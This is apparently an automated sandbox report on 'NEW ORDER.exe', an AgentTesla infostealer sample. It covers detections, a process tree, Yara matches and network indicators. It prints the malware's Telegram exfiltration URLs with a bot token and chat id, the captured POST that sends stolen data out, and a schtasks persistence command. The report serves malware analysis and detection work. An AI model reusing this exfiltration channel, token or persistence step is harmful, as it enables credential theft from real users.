Windows Analysis Report
NEW ORDER.exe

Overview

General Information

Sample Name: NEW ORDER.exe
Analysis ID: 680495
MD5: 8577851a51c92b4d637b3ac6f58763a1
SHA1: eb981f97bd164fc30a36eacefee119bd90db9ed9
SHA256: f39991524680779f0c158a55fdd1d2c2802d88bc36c341c97b60756312dbe1cc
Tags: agentteslaexe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
.NET source code contains very large strings
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • NEW ORDER.exe (PID: 4932 cmdline: "C:\Users\user\Desktop\NEW ORDER.exe" MD5: 8577851A51C92B4D637B3AC6F58763A1)
    • schtasks.exe (PID: 3372 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvabCK" /XML "C:\Users\user\AppData\Local\Temp\tmp2F70.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • NEW ORDER.exe (PID: 5108 cmdline: {path} MD5: 8577851A51C92B4D637B3AC6F58763A1)
    • svchost.exe (PID: 3372 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • WerFault.exe (PID: 5624 cmdline: C:\Windows\system32\WerFault.exe -pss -s 488 -p 1468 -ip 1468 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)

Malware Configuration

{"C2 url": "https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendMessage"}
{"Exfil Mode": "Telegram", "Chat id": "5597287344", "Chat URL": "https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocument"}

Yara matches (memory dumps)

Source | Rule | Description | Author
00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000002.501750120.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
14 further entries not shown.

Yara matches (unpacked PEs)

Source | Rule | Description | Author
0.2.NEW ORDER.exe.3facab0.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.NEW ORDER.exe.3facab0.2.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.NEW ORDER.exe.3facab0.2.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen
  Strings:
  • 0x30aba:$s10: logins
  • 0x30521:$s11: credential
  • 0x2ca5e:$g1: get_Clipboard
  • 0x2ca6c:$g2: get_Keyboard
  • 0x2ca79:$g3: get_Password
  • 0x2dd6c:$g4: get_CtrlKeyDown
  • 0x2dd7c:$g5: get_ShiftKeyDown
  • 0x2dd8d:$g6: get_AltKeyDown
0.2.NEW ORDER.exe.3facab0.2.unpack | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown
  Strings:
  • 0x2e15e:$a13: get_DnsResolver
  • 0x2c957:$a20: get_LastAccessed
  • 0x2eadc:$a27: set_InternalServerPort
  • 0x2edf8:$a30: set_GuidMasterKey
  • 0x2ca5e:$a33: get_Clipboard
  • 0x2ca6c:$a34: get_Keyboard
  • 0x2dd7c:$a35: get_ShiftKeyDown
  • 0x2dd8d:$a36: get_AltKeyDown
  • 0x2ca79:$a37: get_Password
  • 0x2d518:$a38: get_PasswordHash
  • 0x2e55e:$a39: get_DefaultCredentials
7.0.NEW ORDER.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
10 further entries not shown.

Sigma

No Sigma rule has matched

Snort IDS alert

Timestamp: 08/08/22-17:42:49.480990
Source IP: 192.168.2.4
Destination IP: 149.154.167.220
Source Port: 23153
Destination Port: 443
SID: 2851779
Protocol: TCP
Classtype: A Network Trojan was detected

                  AV Detection

Source: NEW ORDER.exe | Virustotal: Detection: 49%
Source: NEW ORDER.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\HvabCK.exe | Avira: detection malicious, Label: HEUR/AGEN.1235429
Source: NEW ORDER.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\HvabCK.exe | Joe Sandbox ML: detected
Source: 7.0.NEW ORDER.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 7.0.NEW ORDER.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5597287344", "Chat URL": "https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocument"}
Source: NEW ORDER.exe.4932.0.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendMessage"}
Source: NEW ORDER.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: NEW ORDER.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:23153 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 7.0.NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.NEW ORDER.exe.3facab0.2.raw.unpack, type: UNPACKEDPE
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
  POST /bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary=---------------------------8da7969e2d70cb4
  Host: api.telegram.org
  Content-Length: 770
  Expect: 100-continue
  Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
Source: NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: NEW ORDER.exe, 00000007.00000002.502497104.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gesqcS.com
Source: NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org%
Source: NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org%%startupfolder%
Source: NEW ORDER.exe, 00000007.00000002.502403797.0000000002C2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: NEW ORDER.exe, 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER.exe, 00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/
Source: NEW ORDER.exe, 00000007.00000002.502403797.0000000002C2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocument
Source: NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocumentdocument-----
Source: NEW ORDER.exe, 00000007.00000002.502403797.0000000002C2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org4
Source: NEW ORDER.exe, 00000007.00000002.501192727.0000000002B51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown | HTTP traffic detected:
  POST /bot5400730219:AAF6yJi-sq4as7PeSLNrtiGC96YCaGma0y8/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary=---------------------------8da7969e2d70cb4
  Host: api.telegram.org
  Content-Length: 770
  Expect: 100-continue
  Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.telegram.org
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\NEW ORDER.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\NEW ORDER.exe
Source: C:\Users\user\Desktop\NEW ORDER.exe | Code function: 7_2_06D72E88 SetWindowsHookExW 0000000D,00000000,?,?
Source: C:\Users\user\Desktop\NEW ORDER.exe | Window created: window name: CLIPBRDWNDCLASS

                  System Summary

Source: 0.2.NEW ORDER.exe.3facab0.2.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.NEW ORDER.exe.3facab0.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 7.0.NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 7.0.NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.NEW ORDER.exe.2eb63b8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 0.2.NEW ORDER.exe.3facab0.2.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.NEW ORDER.exe.3facab0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: NEW ORDER.exe PID: 4932, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: NEW ORDER.exe PID: 5108, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: initial sample | Static PE information: Filename: NEW ORDER.exe
Source: 7.0.NEW ORDER.exe.400000.0.unpack, <PrivateImplementationDetails>{294C783D-9AEA-48A9-8C51-BFB41AF27519}/44BAB482-FBA8-4952-9839-DE6C7A63A330.cs | Large array initialization: .cctor: array initializer size 11689
Source: NEW ORDER.exe, ?QnN??lK?/??EFdowRHI?n?.cs | Long String: Length: 20037
Source: HvabCK.exe.0.dr, ?QnN??lK?/??EFdowRHI?n?.cs | Long String: Length: 20037
Source: 0.0.NEW ORDER.exe.960000.0.unpack, ?QnN??lK?/??EFdowRHI?n?.cs | Long String: Length: 20037
Source: NEW ORDER.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.NEW ORDER.exe.3facab0.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.NEW ORDER.exe.3facab0.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 7.0.NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 7.0.NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.NEW ORDER.exe.2eb63b8.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 0.2.NEW ORDER.exe.3facab0.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.NEW ORDER.exe.3facab0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000007.00000000.265553300.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: NEW ORDER.exe PID: 4932, type: MEMORYSTR | Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, score = file, reference = Internal Research
Source: Process Memory Space: NEW ORDER.exe PID: 4932, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: NEW ORDER.exe PID: 5108, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 488 -p 1468 -ip 1468
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_014CE810
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_014CE820
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_014CBF54
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B9738
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B3F50
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B55F0
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B2D00
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078BD4B0
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B4BC0
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B3340
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B875A
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B8760
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B3E98
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078BDE20
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B55E3
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B8508
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B84F9
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078BDB80
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B8B90
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B8BA0
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B4BB0
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B3330
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078B8998
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078BD960
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_078BF008
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_08252035
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_08250006
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_08250040
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 0_2_08252123
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F14C0
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060FA4E0
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060F4CF0
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060FD53B
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_060FD540
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_0612F508
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_06125DD3
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_06125878
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_0612B940
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_06123330
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_0612CB9F
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_0612CBA8
                  Source: C:\Users\user\Desktop\NEW ORDER.exeCode function: 7_2_06D7B460
                  Source: NEW ORDER.exe, 00000000.00000002.270184623.0000000002E71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs NEW ORDER.exe
                  Source: NEW ORDER.exe, 00000000.00000002.270184623.0000000002E71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedZaLUMapCOtfsZhGCygeOpdbZ.exe4 vs NEW ORDER.exe
                  Source: NEW ORDER.exe, 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedZaLUMapCOtfsZhGCygeOpdbZ.exe4 vs NEW ORDER.exe
                  Source: NEW ORDER.exe, 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs NEW ORDER.exe
                  Source: NEW ORDER.exe, 00000000.00000002.277628722.0000000003E79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFrTGi.exe6 vs NEW ORDER.exe
                  Source: NEW ORDER.exe, 00000000.00000000.227057982.0000000000962000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFrTGi.exe6 vs NEW ORDER.exe
                  Source: NEW ORDER.exe, 00000000.00000003.256225494.00000000034C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs NEW ORDER.exe
                  Source: NEW ORDER.exe, 00000000.00000002.292192745.00000000076A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs NEW ORDER.exe
                  Source: NEW ORDER.exe, 00000007.00000002.496413637.00000000009A8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs NEW ORDER.exe
                  Source: NEW ORDER.exe, 00000007.00000000.265923342.0000000000436000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedZaLUMapCOtfsZhGCygeOpdbZ.exe4 vs NEW ORDER.exe
                  Source: NEW ORDER.exeBinary or memory string: OriginalFilenameFrTGi.exe6 vs NEW ORDER.exe
                  Source: NEW ORDER.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: HvabCK.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: NEW ORDER.exeVirustotal: Detection: 49%
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile read: C:\Users\user\Desktop\NEW ORDER.exe
                  Source: NEW ORDER.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\NEW ORDER.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Users\user\Desktop\NEW ORDER.exe "C:\Users\user\Desktop\NEW ORDER.exe"
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvabCK" /XML "C:\Users\user\AppData\Local\Temp\tmp2F70.tmp
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Users\user\Desktop\NEW ORDER.exe {path}
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 488 -p 1468 -ip 1468
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvabCK" /XML "C:\Users\user\AppData\Local\Temp\tmp2F70.tmp
                  Source: C:\Users\user\Desktop\NEW ORDER.exeProcess created: C:\Users\user\Desktop\NEW ORDER.exe {path}
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 488 -p 1468 -ip 1468
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\NEW ORDER.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                  Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\NEW ORDER.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile created: C:\Users\user\AppData\Roaming\HvabCK.exe
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2F70.tmp
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/5@1/2
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile read: C:\Users\user\Desktop\desktop.ini
                  Source: NEW ORDER.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\NEW ORDER.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5624:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_01
                  Source: C:\Users\user\Desktop\NEW ORDER.exeMutant created: \Sessions\1\BaseNamedObjects\OBUHBKOjWEiTmUJKeKj
                  Source: NEW ORDER.exeString found in binary or memory: Address:/AddressToolStripTextBox-AddressToolStripButton'ToolStripSeparator3'PhoneToolStripLabel
                  Source: 7.0.NEW ORDER.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\Desktop\NEW ORDER.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
